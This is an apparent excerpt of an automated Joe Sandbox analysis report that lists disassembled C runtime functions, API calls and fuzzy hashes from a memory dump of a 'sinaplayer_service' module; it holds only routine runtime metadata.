                                                                                                                                                                                                    • Instruction ID: 95ffe8b98fef194abd51200968c3603cc7f054bc82f09fa77397da4b6f25f334
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a13e617c9f508fcf4ee62a81009cd14d25d7c832a1838dab903f704837977b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0721C3312082019FFB158F64D858B7B77FCFF4A350F10046AEA968B181CB71E805CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F5A79
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F5AC3
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F5AD3
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F5B2C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$BorrowedConcurrency::details::EnterH_prolog3LeaveProxy::SchedulerStateToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260543872-0
                                                                                                                                                                                                    • Opcode ID: 0101cae68c1efe99898126763d236a47c12137fce75b43d80e00f2597425f137
                                                                                                                                                                                                    • Instruction ID: 0f09637bf91d62aeef6715b47634bc02bcd6ba5dd1beaa1973eec42c990b0332
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0101cae68c1efe99898126763d236a47c12137fce75b43d80e00f2597425f137
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62212A746042469FEB05CF25C488BB97BF0BF45315F218189EC158F296C7B4E952CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D0ADE20,00000014), ref: 6D0ADDCC
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fgetwc_nolock.MSVCR120(?,?,?,6D0ADE20,00000014), ref: 6D0ADDE0
                                                                                                                                                                                                    • _errno.MSVCR120(6D0ADE20,00000014), ref: 6D0B175F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0ADE20,00000014), ref: 6D0D4F61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3916178533-0
                                                                                                                                                                                                    • Opcode ID: 046a392aa320d4742232906cb6f40c90ea0a628746f29f145db0bd11c2471525
                                                                                                                                                                                                    • Instruction ID: c777f0fc9f3372014e7ca2262b96554b0494ad7ecced4ac4bebc443b10ded1d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046a392aa320d4742232906cb6f40c90ea0a628746f29f145db0bd11c2471525
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F211E630998316DAFB129FA4C4403BE32F0EF69714F058516DC24DB281E77CC541CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___copy_to_char.LIBCMT ref: 6D0FD5B1
                                                                                                                                                                                                      • Part of subcall function 6D0FBAD8: _errno.MSVCR120(00000000,00000000,?,?,6D0FD240,6D0FD344,?,?,?,?,?,6D0FD330,?,?), ref: 6D0FBAE5
                                                                                                                                                                                                      • Part of subcall function 6D0FBAD8: _invalid_parameter_noinfo.MSVCR120(00000000,00000000,?,?,6D0FD240,6D0FD344,?,?,?,?,?,6D0FD330,?,?), ref: 6D0FBAEF
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,00000104,?,00000000,?,?,?,?,6D0FD694,?,?), ref: 6D0FD5D2
                                                                                                                                                                                                    • free.MSVCR120(?,6D0FD694,?,?), ref: 6D0FD5E1
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FD694,?,?), ref: 6D0FD620
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FeaturePresentProcessProcessorTerminate___copy_to_char__crt_errno_invalid_parameter_noinfo_invoke_watsonfreestrcpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471170729-0
                                                                                                                                                                                                    • Opcode ID: a87bed1b3754add4628d06fd8ecc3efec46b0da3e58957822754d66e712da6c5
                                                                                                                                                                                                    • Instruction ID: f945a1ba116d9d46c74e0b82c3eb5acda5ad922391209c63ad8d9916b14cd974
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a87bed1b3754add4628d06fd8ecc3efec46b0da3e58957822754d66e712da6c5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11DAB5A0470AAFD710CF69D980946F7F8FF096147108A6AE959C3B00E371FA558FA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE82
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,?,?,?,?,?,?,6D0AFDFE,?,?,?), ref: 6D0AFE89
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0AFDFE,?,?,?,?,?,?,?,?,?,6D0AFE20,0000000C), ref: 6D0D5631
                                                                                                                                                                                                    • _ftell_nolock.MSVCR120(?,?,?,?,?,6D0AFDFE,?,?,?,?,?,?,?,?,?,6D0AFE20), ref: 6D0D5645
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_ftell_nolock_lseek
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1482834326-0
                                                                                                                                                                                                    • Opcode ID: e1b8fd3bb3692f9a2688dcc8388ed6d6cb7c2fe34ff5bc3a77c116305ee9a9b1
                                                                                                                                                                                                    • Instruction ID: 639f83ccf0a397cd6a01fe86be003aa1163f73254919b11d902c14d553a78149
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1b8fd3bb3692f9a2688dcc8388ed6d6cb7c2fe34ff5bc3a77c116305ee9a9b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C1104361147055FFB119FA8C880BAE77ACEF57378B18821AF9749B1D2D736E80187A4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0FA830
                                                                                                                                                                                                      • Part of subcall function 6D0E8D76: _SpinWait.LIBCMT(?,?,6D0EF2B2,00000000), ref: 6D0E8D8E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6D0FA84D
                                                                                                                                                                                                    • Concurrency::details::ScheduleGroupSegmentBase::GetInternalContext.LIBCMT ref: 6D0FA859
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 6D0FA874
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base::Concurrency::details::ContextInternalSpin$Concurrency@@DeferredGroupOnce@?$_PrepareScheduleSchedulerSegmentWaitWait@$00@details@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328162323-0
                                                                                                                                                                                                    • Opcode ID: d0d83f327039b8419f5ce4b056e78f56b723db306bdc9727f373dc2f147b11d9
                                                                                                                                                                                                    • Instruction ID: 92a8456f9a02d4dda93a8658161b2a9eda93d59b12a99e71c502bc36ce7ddde3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0d83f327039b8419f5ce4b056e78f56b723db306bdc9727f373dc2f147b11d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC11BF75608705AFE711DE64C880E3AB3E5EF84358B20492DEE6247250CB71E807CBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _ldtest_log1psqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 198549442-0
                                                                                                                                                                                                    • Opcode ID: 53d851f239d67840519314a9c70163e5ffb4e245e05c70d42aec118e78fb717b
                                                                                                                                                                                                    • Instruction ID: b458e1ed1f48104ff6a223b98aa2a0afaca1183c76f5ccd314af8ab4a3ac989c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53d851f239d67840519314a9c70163e5ffb4e245e05c70d42aec118e78fb717b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B0149B2C0490DA1CF163F50E5542D57B78EB06BD1B228984D585F12A9BFB289904AC4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10ABB0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10ABBB
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10ABCC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10ABD7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328987296-0
                                                                                                                                                                                                    • Opcode ID: 30a932556a2887eb90f6c4205129141b8376bceff24a984aedeffff12ab9b976
                                                                                                                                                                                                    • Instruction ID: fef3a4d56e5565d54af0db9c2d1ee0c8d2da3fc2c0fc93d80193a2c0b7089654
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30a932556a2887eb90f6c4205129141b8376bceff24a984aedeffff12ab9b976
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1114C30A0C2465BDB12BF289900B79B765EF52318F174599D8704F1D9DFF29882C7A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: GetCurrentThreadId.KERNEL32 ref: 6D0FA65B
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: swprintf_s.MSVCR120(?,00000401,[%d:%d:%d:%d(%d)] ,00000000,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA685
                                                                                                                                                                                                      • Part of subcall function 6D0FA621: vswprintf.LIBCMT(00000401,00000401,?,6D0FA4C1,?,?,?,?,?,6D0FA4C1,?), ref: 6D0FA6AD
                                                                                                                                                                                                    • _fwprintf.LIBCMT(6D15E040,?), ref: 6D0FA4DB
                                                                                                                                                                                                      • Part of subcall function 6D102828: _errno.MSVCR120(6D1028C0,0000000C,6D0FA4E0,6D15E040,?), ref: 6D102847
                                                                                                                                                                                                      • Part of subcall function 6D102828: _invalid_parameter_noinfo.MSVCR120(6D1028C0,0000000C,6D0FA4E0,6D15E040,?), ref: 6D102852
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D0FA4F4
                                                                                                                                                                                                    • fflush.MSVCR120(00000032,00000000), ref: 6D0FA517
                                                                                                                                                                                                      • Part of subcall function 6D0A0A94: _lock_file.MSVCR120(?,6D0A0AE0,0000000C), ref: 6D0A0AB1
                                                                                                                                                                                                      • Part of subcall function 6D0A0A94: _fflush_nolock.MSVCR120(?,6D0A0AE0,0000000C), ref: 6D0A0ABB
                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 6D0FA526
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDebugOutputStringThread__aullrem_errno_fflush_nolock_fwprintf_invalid_parameter_noinfo_lock_filefflushswprintf_svswprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114624150-0
                                                                                                                                                                                                    • Opcode ID: d9c273d21ef9b5b468d966b22e5a6f9d21c4382307c1fcf42301fa12ffb4f7b2
                                                                                                                                                                                                    • Instruction ID: 73e7bea96fae6cca4421e756e4e1fafe5b6016b9d2d063b5f491ed7d8d79dbc6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9c273d21ef9b5b468d966b22e5a6f9d21c4382307c1fcf42301fa12ffb4f7b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A118A76904105DBDF50DF65E850FAA37F8EB49715F214059E90497141FFB0AA85CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC521
                                                                                                                                                                                                    • malloc.MSVCR120(00000001,00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC52A
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,6D163B90,00000001,?,6D0FC4E5,00000000,00000000), ref: 6D0AC53C
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D0D603D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocHeap_invoke_watsonmallocstrcpy_sstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4191897266-0
                                                                                                                                                                                                    • Opcode ID: 7e3913ea4bbe5590477aef437292c44a840911bebf62fcb2155f105b1f15f24f
                                                                                                                                                                                                    • Instruction ID: 1038e43002c73814336e93e1f892fae9ecc66d5ac18a969d7d1f8df3a1700502
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e3913ea4bbe5590477aef437292c44a840911bebf62fcb2155f105b1f15f24f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0463221C20A2BF71099F8AC4077B37DCD786258B808479FE08CA100F6668991A194
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6D0DF3F5
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0DF404
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 6D0DF40D
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6D0DF41A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                    • Opcode ID: 04e5be1122a3187302041b01e6cbe4f1fffcf7474a9adca5b9c86cffd3ca4fa9
                                                                                                                                                                                                    • Instruction ID: 452261425ddada45bc995add9b053cfc9c83a770fc2cb214cae2a5c753029da1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e5be1122a3187302041b01e6cbe4f1fffcf7474a9adca5b9c86cffd3ca4fa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17113DB1D05249ABEF44DBB9E5547BE7BF8EF49311F6145AAD502E7240EB708A008B50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CC3
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0F5CCD
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CD3
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0ECA56,?,?,00000000), ref: 6D0F5CE0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveListfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 645074056-0
                                                                                                                                                                                                    • Opcode ID: 89a49ad003f0687a9a84939a16ac255b101331ca1e6f6ee04a9c83e62dd6e4c7
                                                                                                                                                                                                    • Instruction ID: 1f33ca255df95280ec10fad64ae37479876caf3efa1c28425dc3511fa8e21216
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a49ad003f0687a9a84939a16ac255b101331ca1e6f6ee04a9c83e62dd6e4c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A11C276601110DFCB08DF58D885A69F7B8FF99314725409AE8069B352C772ED02CBD4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F82D
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F845
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • free.MSVCR120(?,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000), ref: 6D0D758A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
